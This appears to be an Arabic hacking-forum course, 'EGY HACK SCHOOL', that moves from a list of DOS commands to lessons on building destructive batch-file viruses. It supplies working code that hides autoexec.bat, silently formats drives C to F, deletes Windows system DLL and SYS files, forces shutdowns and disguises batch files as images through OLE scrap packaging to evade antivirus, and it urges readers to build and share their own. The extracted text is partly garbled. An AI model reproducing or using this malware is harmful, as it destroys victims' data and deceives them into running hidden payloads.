هامة: الأمر
بايت من الذاكرة الأساسية.
وهو من الأوامر الخارجية ووظيفته: MSD : 20 الأمر
1اكتشاف
مواصفات الحاسب من حيث:
( نوع المعالج حجم
الذاكرة أنواع
مشغلت
الأقراص مواصفات
نظام العرض وباقي
المكونات).
2الحصول
على تقارير فنية تفيد باكتشاف
المشاكل التي حدثت على الحاسب مثل تلف
. RAM شرائح الذاكرة الوهو
من الأوامر الخارجية Command : 21 الأمر
ووظيفته تفسير أوامر نظام التشغيل الداخلي.
وهو من الأوامر الخارجية ووظيفته DEFRAG : 22 الأمر
تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص
المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي
جوار بعضها وبالتالي توفير مساحة إضافية.
وهو من الأوامر الخارجية FORMAT : 23 الأمر
ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
وهو من الأوامر الخارجية ووظيفته LABEL : 24 الأمر
إعادة تسمية السطوانة أو تعديل إسمها أو مسحه.
وهو من الأوامر الخارجية DISKCOPY : 25 الأمر
ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها
تماما من حيث النوع والحجم والسعة ويقوم بنسخ
كامل الملفات حتى المخفية.
ل يستطيعان XCOPY والأمر COPY ملحظة : (الأمر
نقل الملفات المخفية).
وهو من الأوامر الخارجية ووظيفته CHKDSK : 26 الأمر
فحص الأسطوانة وإعطاء تقرير عن حالتها.
وهو من الأوامر الخارجية UNFORMAT : 27 الأمر
ووظيفته إستعادة محتويات أسطوانة ما كانت قد
.FORMAT مسحت جميع محتوياتها من خلل الأمر
ملحظة
هامة:
إعادة محتويات UNFORMAT يستطيع الأمر
الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم
عند التهيئة FORMAT إستخدامها مسبقاً مع الأمر
وإل فأنه يستحيل إعادة محتويات الأسطوانة كما
كانت .
وهو من الأوامر الخارجية ووظيفته: SYS : 28 الأمر
إلي أسطوانة MSDOS
1نسخ
ملفات نظام التشغيل
ما.
إلي أسطوانة ما. COMMAND.COM 2نسخ
ملف
وهو من الأوامر الخارجية DISKCOMP : 29 الأمر
ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملحظة: هذا الأمر ل ينفع التعامل به مع أقراص صلبة
على الإطلق.
وهو من الأوامر الخارجية SCANDISK : 30 الأمر
ويستخدم لكتشاف إي أجزاء تالفة على القرص .
وهو من الأوامر الخارجية ووظيفته FDISK : 31 الأمر
تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل
.DOS
وهو من الأوامر الخارجية ووظيفته TREE : 32 الأمر
عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك
عرض مساراتها.
وهو من الأوامر الخارجية ووظيفته MOVE : 33 الأمر
نقل ملف أو أكثر أو فهرس فرعي من مكان لخر.
وهو من الأوامر الخارجية DELTREE : 34 الأمر
ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان
بداخله ملفات.
وهو من الأوامر الخارجية UNDELETE : 35 الأمر
.DEL ووظيفته استعادة الملفات الممحاة بواسطة الأمر
ملحظات هامة:
فإن نظام التشغيل DEL 1عندما
يتم حذف ملف بالأمر
يقوم بتغيير الحرف الأول من هذا الملف وتحويله DOS
إلي علمة ؟.
2يمكن
استرجاع ملف قبل تخزين إي ملف آخر جديد
على الملف السابق.
وهو من الأوامر الخارجية ووظيفته ATTRIB : 36 الأمر
يعرض ويتحكم في صفحات الملف وذلك بتغيير
خصائصه كجعله مثلً ملف خفي أو ملف نظام أو قابل
للقراءة فقط أو غير ذلك.
وهو من الأوامر الخارجية ووظيفته PRINT : 37 الأمر
طباعة الملفات النصية فقط.
وهو من الأوامر الخارجية ووظيفته XCOPY : 38 الأمر
نسخ مجموعة من الملفات أو الفهارس .
وهو من الأوامر الخارجية وهو عبارة EDIT : 39 الأمر
والذي من DOS عن محرر نصوص تابع لنظام التشغيل
خلله تتمكن من كتابة وتعديل الملفات.
ملحظات
هامة:
حيث COPY CON يعالج هذا الأمر جميع عيوب الأمر
أنه باستخدامه يمكن عمل التي:
1فتح
ملف سبق حفظه والتعديل فيه.
2التحرك
داخل الملف يميناً ويساراً ولأعلى ولأسفل .
Save ثم نختار أمر Alt+F 3يتم
حفظ الملف باستخدام
ثم كتابة أسم الملف.
ثم نختار أمر Alt+F يتم
الخروج من الأمر باستخدام
.Exit
لبد من وجود ملف EDIT لكي
يعمل الأمر
QBASIC.EXE
بسم الله الرحمن الرحيم
الدرس الثاني:
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
1تعريف
الملفات الدفاعية :
DOS هي عبارة عن حزمة من اوامر نظام التشغيل
يمكننه من خلله استخدام اكثر من امر دوسي في
وقت واحد مما يسهل للمستخدم الستخدام مثل
|format,copy,cd ..... | استخدام اكثر من امر 393
2.
طرق صناعة الملفات الدفاعية :
الطريقة الولى :
واكتب
Run واضغط على start <1
.افتح
ENTAR واضغط على command
ثم اسم الفيروس | 564 | و (copy con) 2.اكتب امر
Enter ثم اضغط bat المتداد
3.اكتب الكود
4.لحفظ طريقتان هما
Enter ومن ثم F 1.اضغط على 6
Enter و من ثم Ctrl + z 2.اضغط على
الطريقة الثانية :
1
.ابدأ >
البرامج >
البرامج الملحقة >
Notepad المفكرة
2.اكتب الكود
و حدد الموقع bat 3.احفظ الفيروس بامتداد
الطريقة الثالثة :
DOS
<1
.ابدأ >
البرامج
Edit 2.اكتب
| 3.ادخل الكود | 312
و حدد المسار الخاص به bat 4.قم بحفظ الملف بمتداد
3ايعازات
التشغيل :
اليعاز الوظيفة
تمنع عمل الإيعاز ( تعرض سطر على الشاشة ) Echo
نقل بدون السؤال نعمل
Nul
الدخول الى ملف Call
@ يمنع عرض السطر على الشاشة
يمسح الشاشة Cls
يقول للضحية الضغط على اي زر Puse
بعد هذا المر ضع اسم اي برنامج ليتم تغيله Start
عند تشغيل الفيروس
يوضع في نهاية الفيروس و هو ينهي الفيروس بعد End
تنفيذ الوامر
ايعاز ل n/
الدخول الى ملف \cd
الخروج من ملف cd\
| ايعاز نعم | 364 y/
***ارجوا ان تكون واضحة و هي سهلة الستخدام
4طريقة
تشفير الفيروس :
اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل
لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير
فسوف اذكر السبب في الدرس exe الى bat المتداد من
الرابع في قسم اسئلة و حلول ...
عن طريق برنامج Batch يمكنك تغير امتداد ال
في الصداران الخامس و Microsoft Visual Basic
السادس :
1.افتح برنامج الفيجول بيسك
من قائمة الدوات سوف تظهر لك OLD 2.اختر الداة
ثم Create from File اختر منها Insert Object نافذة
واختر الصورة التي تريدها أو Browse اضغط على
OK مقطع فلم أو اي شيء تريده ثم اضغط على
مره اخرى وارسم مربع ثاني واختار OLE 3.اختر اداة
واختر الباتش Browse ثم Create from File
OK الذي تريده ثم اضغط
4.ادخل كود الفروم :
:
Microsoft Visual Basic 5.0
LE1.DoVerb OLE2.DoVerb
:
Microsoft Visual Basic 6.0
OLE1.DoVerb
OLE2.DoVerb
تقوم باخفاء الفورم ' me.hide
سوف
Make Project1.exe اختر File 5.من قائمة
اكتب اسم الملف Make Project تأتيك نافذة باسم
لقد انتهينا |Virus | الذي تريد تسميته مثل اكتب 105
EXE من دمج الباتش مع الصوره ولكن امتداده
الى امتداد غير EXE 6.الن سوف نقوم بتغيير امتداد
معروف| 104 | من قبل الكثير من مستخدمي النترنت
والمتداد
وهذا المتداد جدا خطير لما فيه من امكانيات SHS هو
Scrap Object التصال مع البرامج الخرى وهو
والطريقه هي كالتالي :
افتح البرنامج WordPad 1.قم بتشغيل برنامج
وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
الباتش+الصورة حاول تنسق النوافذ والن اضغط على
بالزرار اليسر مره واحده ول ترفع Virus البرنامج
WordPad اصبعك عن الزرار ثم اسحبه الى برنامج
سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا
اضغط بالزر اليمن على
Package اختر WordPad 2.الملف الذي انتقل الى
سوف تظهر لك نافذه بأسم Edit Package ثم Object
اختر Object Packager Package
in Document
ثالثا واخيرا اختر Copy Package ثم Edit قائمة
ثم اضغط في المكان EditServer المجلد الذي به ملف
لصق) سوف ) Paste الفارغ على الزرار اليمن ثم اختر
| وهذا | 535 Scrap يتكون لك ملف شكله غريب باسم
واذا ضغط عليه دبل shs هوالملف قد تغير امتداده الى
كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف
الباتش الذي دمجته مع الصوره والن قد حصلت على
باتش مرفق بصوره .
يبدأ start يتصل في ملف معين اما المر Call المر
بتنفيذ امر او تشغيل برنامج
: ( مثال ( 1
:PHP كود
call attrib h
r
c:autoexec.bat >nul
للتصال Call اخوي في هذا المثال استخدمنا المر
و قمنا بتغير خصائصه autoexec في الملف
: ( مثال ( 2
:PHP كود
start MSPaint
في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا
الفيروس عمله
enter ويضغط y واريد المستخدم مثل يضغط حرف
يتنفذ امر اخر enter و n وينفذ امر معين و
اخي سوف اعطيك مثال عندما تقوم بالفورمات
سوف يسألك الحاسب هل انت متأكد اجب ب
هنا نكتب هذا اليعاز لتجاهل الرسالة و ال اذ لم Y,N
نكتب اليعاز سوف يظهر مثل رسالة تقول للضحية
سوف تقوم بحذف مجلد الوندوز هل انت متأكد من ذلك
... و اكيد سوف يجب ب ل و هكذا ل يعمل الفيروس...
بسم الله الرحمن الرحيم
الدرس الثالث:
صناعة الفيروسات عن طريق المفات الدفاعية
اليوم يا شباب راح انكمل دروس احتراف صناعة
Batch Files الفيروسات عن طريق المفات الدفاعية
المهم نحن بهذاك الدرس اتعلمنا بعض اليعزات و
طريق تشفير و غير ذالك ... المهم هذا الدرس راح انطي
امثلة عن العمل مع الملفات اخواني انا في هذه
الدروس اعلمكم على كيفية التعامل مع الملفات
الدفاعية لنه بعد التعلم سوف تقدر ان تصنع
فيروسات بدون مساعدة من اي شخص و تصنعون
فيروسات غير مكشوفة ان شاء الله
1اوامر
و امثلة :
del Delete
File
del c:\windows\*.txt
الشرح : لمسح ملف ما في هذا المثال قمنا بمسح كل
ما يوجد في مجلد الوندوز
deltree Delete
Folder
deltree \y c:\windows
الشرح : لمسح ملف اي ليس له امتداد ملف هنا مسحنا
ملف وندوز وليس ما بداخل الوندوز ملحوظة هامة هذا
المر ليعمل علي الكس بي يعمل علي 98 اوك .
call Open
Or Call Another .bat File
call c:\windos\anything.bat
الشرح : هنا قمنا بأتصال مع ملف اخر لتحرير و مسح و
نقل ...
cls Clear
The Screen
الشرح : هذا المر من اجل تنظيف الشاشة من الحرف
echo Allows
You To Write Anything
echo hahaha i will kill yr computer
الشرح : هذا المر من احدى اجمل اليعازات و هو
يجعل الضحية | 596 | يقرأ المكتوب مثلً كتبة انا دمرتك
يمكنه قرائته اي انه فقط لكتابة السطور
goto To
Go To a Nother Section In a Batch
File
start:
echo i hack you
goto next
next:
del c:\windows\*.exe
يعمل go to الشرح : في هذا المثال استخدمنا المر
على | 554 | الذهاب الى امر اخر لتنفيذه
copy %0 To
Copy The Running File To
Another Place
copy %0 c:MyDocument\anything.bat
الشرح : اما عن هذا المر فهو مخصص لنسخ ملف
copy
: Dos عن طريق Batch 2.طريقة تغير امتداد
تفتح لك شاشة command اكتب start اذهب الى
سوداء مكتوب فيها
cd:\windows
انت في هذه الحالة تكتب
cd..
كرر هذا المر الى ان تجعلها
my cumputer بعد ما تنتهي من هذا المر تذهب الى
(c:) ثم تختار
وضع الفيروس | 4| فية ثم اذهب الى الدوس و اكتب هذا
المر
cd:\>copy virus.exe virus.com
هو اسم الفيروس تبعك virus
com,scr,bat وممكن تغير المتداد الى
ملحظة :*** اخواني انا متأكد من الطريقة و مجربة و
ناجحة 100 % اكو شيء ثاني ليس تغير المتداد بل
منع مضادات الفيروسات من حذف الفيروس الطريقة
سهلة جدا و ذكية في نفس الوقت كتالي :
انت مو كونت فيروس كويس اعمل التالي ادخل الى
الدوس و ادخل الى ملف الفيروس فرضاً اسم الفيروس
اذن اكتب التالي : moodax.bat
ren moodax.bat ~moodax*<virus.bat
هذا المر يمنع اي شخص من حذف الفيروس طبعاً
السؤال اخواني انتظروا الدرس التالي للجواب لكن من
اجل العلم فقط لنه الوندوز ما يقبل علمات او اي
شيء غير الحرف و الرقام لهذا سوف تحدث معركة
بين الوندوز و المضاد علقناها...
بسم الله الرحمن الرحيم
الدرس الرابع:
للحتراف صناعة الفيروسات
المقدمة :
في الدروس السابقة قد قمت بطرح مفاهيم و
شروحات لبعض منها ليس له علقة في الدورة مثل
طريقة التشفير و تغير المتداد و الذكاء الفيروسي مع
اني لم اعطي ال جزء منه ان هذا الدرس ل تحدث
عن الذكاء الفيروسي ل كن نحن ل نستطيع صناعة
فيروس ذكي عن طريق الملفات الدفاعية طبعاً لماذا
اخواني يمكننا تطبيق خاصية الذكاء الفيروسي فقط في
اللغات البرمجية و هذه التي ندرسها الن ليست لغة
برمجية بتاتاً لكنه احدى اهم مكونات نظم التشغيل
الحديثة و القديمة !! و نسبة مستخدمي نظام النوافذ في
العالم عددهم ليس بالقليل هذه الفيروسات التي
نصنعها ل تعمل ال اذ كان هناك على الحاسب نظام
دوس السبب لنه قد اشرنا في الدرس الول في قسم
المقدمة في الجزء الول ((تعريف)) انه الملفات
الدفاعية هي ليست ال حزمة من اوامر نظام التشغيل
الدوس ...
1الكود
الكثر استخداماً :
في هذه الفقرة سوف اعطيكم كودات يستخدمه اغلب
مبرمجي الفيروسات
1.هذا الكود لمنع كشف المضاد على الفايروس
:PHP كود
call attrib h
r
c:autoexec.bat >nul
2.هذا الكود للفورمات
:PHP كود
echo format a: /q /u /autotest >nul
>>c:autoexec.bat
3.هذا كود للفورمات لكن بالختصار
:PHP كود
echo & /autotest >nul >>c:autoexec.bat
ألولى تعنى انسخ المر القادم الى
(طبعاً معروف من الكود الول انة الى الوتواكسك)
الثانية تعنى اجراء وتنفيذ المر بدون طلب تحذير بتاع
yes and NO
لأانك عارف لما تعمل فورمات لبد ان يحذرك الول
ونحن نريد الفيرس يعمل فورمات بدون ما يحذر الضحية
اذن هذا الكود هو المسئول عن هذا ويعنى ايضا ان
النسخ يكون الى ملف الوتواكسيك فى السى
| 4.هذا كود فورمات كل القراص | 385
:PHP كود
echo format c: /q /u /autotest >nul
>>c:autoexec.bat
echo format d: /q /u /autotest >nul
>>c:autoexec.bat
echo format e: /q /u /autotest >nul
>>c:autoexec.bat
echo format f: /q /u /autotest >nul
>>c:autoexec.bat
5.هذا كود فيروس العد التنازلي و علجه :
:PHP كود
@echo off
اذا فتحت الفايروس راح يعد تنازلي من shutdown s
30 ثانية ويطلع بدون رسالة اذا كنت تريد يطلع معاه
رسالة وتوقيت غير
:PHP كود
@echo off
طبعا نغير 30 الى "shutdown s
t
30 c
"message
الى الرسالة message عدد الثوان و
اغلق الجهاز على الشبكة
@echo off
shutdown s
t
15 c
"message" m
طبعا نغير 15 الى عدد الثوان و \\namecomputer
الى namecomputer الى الرسالة ونغير message
الجهاز المراد اغلقه
العلج :
shutdown –a
2مجموعة
من الكودات مع الشرح (المفصل) :
اما عن هذه الفقرة سوف اقوم بأعطائكم كودات لكن
مع شرح مفصل جداً
1 اذ
اردت كتابت كود فيروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء
ملف تكست | 391 | اسمة مثلً اكس
غير الفورمات على dos ملحظة : يمكنك وضع اى كود
هذة القاعدة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
nul >>c:autoexec.bat< كود دوسى echo
والسطر الخير يكرر ان كنت تريد اما اذا كانت العملية
تتطلب الغاء رسالة تحذيرية فتكون القاعدة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
autotest >nul >>c:autoexec.bat/ كود دوسى echo
مع تكرار السطر الخير ان تتطلب ويمكنك وضع قاعدة
مشتركة
:PHP كود
call attrib h
r
c:autoexec.bat >nul
autotest >nul >>c:autoexec.bat/ كود دوسى echo
nul >>c:autoexec.bat< كود دوسى echo
يعنى نفكر كدة انا كان الكود هاعترض رسالة فى احد
لتفادى الرسالة autotest/ السطور فلبد من اضافة
التحذيرية
2 اذ
اردت كتابت كود فايروسي يعمل التالي
يدخل على قرص الذي عندى الضحية ويقوم بالغاء
ملف تكست اسمة مثلً اكس هل هذة الفكرة تعترضها
رسالة تحذيرية
بالطبع ل اذن اتبع القاعدة الولى يكون الكود كما يال
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del x.txt >nul >>c:autoexec.bat
التحليل
:PHP كود
call attrib h
r
c:autoexec.bat >nul
ذكرنا انفاً الن لدخول الدريف والغاء ملف اسمة
اكس(تكست مثلً) فى الدوس كنت باتكتب
للغاء /:d فيتحول المحث | 373 | الى c:/ press enter
هاتكتب
اذن معنا الكود الدوسى وقد d:/Del x.txt press enter
قمنا بالعملية على كام خطوة على خطوتين اذن معنا
الكود وعد الخطوات ومعنا الكود الساسى للفيرس
نستنتج التالى عدد سطر الكود لبد ان يكون
اثنين + واحد (اساسى) + اى عدد لو عاوز تكمل
الفيرس لشىء تانى فيكون
:PHP كود
call attrib h
r
c:autoexec.bat >nul
(اساسى)
:PHP كود
echo d: >nul >>c:autoexec.bat
(الدخول على الدريف دى)
:PHP كود
echo Del x.txt >nul >>c:autoexec.bat
(الغاء ملف امسة اكس تكست)
تذكر :::::
:PHP كود
nul >>c:autoexec.bat< كود الدوس echo
في txt. 3 اذ
اردت الغاء كل الملفات التي امتدادها
القرص
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.txt >nul >>c:autoexec.bat
في zip. 4 اذ
اردت الغاء كل الملفات التي امتدادها
القرص
:PHP كود
call attrib h
r
c:autoexec.bat >nul
echo d: >nul >>c:autoexec.bat
echo Del *.zip >nul >>c:autoexec.bat
5 كود
يقوم بالغاء ملفات النظام | 300 | و تحليله :
:PHP كود
Echo off@
:c
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
تحليلة :
دخلنا على السى :c
:PHP كود
cd %WinDir%System
دخلنا على ملف السيستم فى الوندوز
:PHP كود
deltree /y *.dll
والتى هي خاص .DLL الغاء كل ملفات المتداد
بالوندوز
خرجنا بعد تنفيذ العملية الولى \cd
:PHP كود
deltree /y *.sys
فى الوندوز. .sys و الغاء كل ملفات
هذا الكود كامل ما عدى كود التاريخ و انت تعرف انه
ل استطيع صنع فيروس يعتمد على التاريخ عن طريق
الملفات الدفاعية يعمل هذا الكود على ايقاف
فقط و اذ اردت يمكنك C,D,E,F المضادات و فورمات
الضافة , و كود اعادة التشغيل اعتقد انه انت قرأت
الدرس الثاني و الول ...
:PHP كود
Echo Virus Format@
Echo [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Echo By RBG7@
call attrib h
r
c:autoexec.bat >nul
format c: /q /u /autotest >nul >>c:autoexec.bat
format d: /q /u /autotest >nul >>c:autoexec.bat
format e: /q /u /autotest >nul >>c:autoexec.bat
format f: /q /u /autotest >nul >>c:autoexec.bat
shutdown s
End
:PHP كود
call attrib h
r
c:autoexec.bat >nul
Bat للتصال في ملف من نوع : Call
هذا امر خاص بالدوس يعمل على تغير : Attrib
خصائص ملف
اخفاء : hجعله
فقط قراءة : rالملف
المراد التنفيذ عليه : c:\autoexec.bat
هذا المر شروح في الدرس الول و يعمل : nul <
على عدم سؤال المستخدم
:PHP كود
format a: /q /u /autotest >nul >>c:autoexec.bat
امر الفورمات : Format
A المر يطبق على القرص :a
سريع : q/
يقوم بحذف الملفات الساسية : u/
هذا المر مهم جدا يقوم بنقل الكود : autotest/
نقل من دون : << nul< المكتوب الى الملف المطلوب
سؤال
الملف الذي سوف يطبق به الكود : c:\autoexec.bat
@echo off
طبعا نغير 30 الى "shutdown s
t
30 c
"message
الى الرسالة message عدد الثوان و
اغلق الجهاز على الشبكة
Echo عدم استخدام المر : echo off@
اخوي البعض يسأل لمذا وضع هذا المر في بعض
الحيان يخطاء المبرمج و يكتب المر و بعده الكود مما
اطفاء : shutdown s
يأدي الى القراءة فقط دون تنفيذ
الحاسب
الوقت : t30
: ثانية
اظهار رسالة : cاكتب
الرسالة التي تريد : message
:PHP كود
Echo off@
:c
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
نعم اخوي هذا كود كامل لفيروس تدمير النظام ل يكتب
في سطر واحد و السبب لنه كود كامل و ليس امر
اخوتي لن وبعد متابعتك للمواضع الربعة ستصبح
محترف في صنع الفيروسات المدمرة واطلب منكم كل
من تابع المواضيع بان يصنع كود فايروسه ويضعه في
قسم خاص بالكودات للصنع الفايروس من اجل تطويره
ايجى هاك سكول
EGY HACK SCHOOL
